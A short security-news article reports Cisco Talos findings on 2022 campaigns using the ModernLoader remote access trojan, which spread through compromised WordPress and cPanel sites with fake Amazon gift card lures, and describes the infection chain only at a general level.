According to Cisco Talos, between March and June 2022, hackers organized three related campaigns, delivering various malware to compromised machines, including RAT ModernLoader, RedLine Stealer, and cryptocurrency miners.
First of all, the experts were interested in ModernLoader, which is designed to establish remote control over the victim’s computer and allows attackers to deploy additional malware, steal confidential information, or make the infected system part of a botnet.
Experts describe ModernLoader (also known as Avatar bot) as a very simple remote access trojan written in .NET. It has the functions of collecting system information, executing arbitrary commands, downloading and running files from the control server, which allows attackers to modify malicious modules in real time.
Cisco Talos links ModernLoader attacks to previously unknown Russian-speaking attackers who use ready-made tools. Among the targets of the hackers were users from Eastern European countries (Bulgaria, Poland, Hungary and Russia).
For their attacks, attackers attempt to hack vulnerable web applications, including WordPress and CPanel, and if successful, distribute malware under the guise of Amazon gift cards (of course, fake ones).
Thus, the payload of the first stage of the attack is an HTML Application (HTA) file that launches a PowerShell script from the attackers’ control server to initiate the deployment of intermediate payloads, which eventually inject malware onto the machine using the process hollowing technique.
Also, the Cisco Talos investigation revealed two more malicious campaigns that took place in March 2022. They were built in much the same way and used ModerLoader as the main means of communication with the malware control server, infecting victims’ machines with additional malware, including XMRig, RedLine Stealer, SystemBC, DCRat, etc. Token maker for Discord.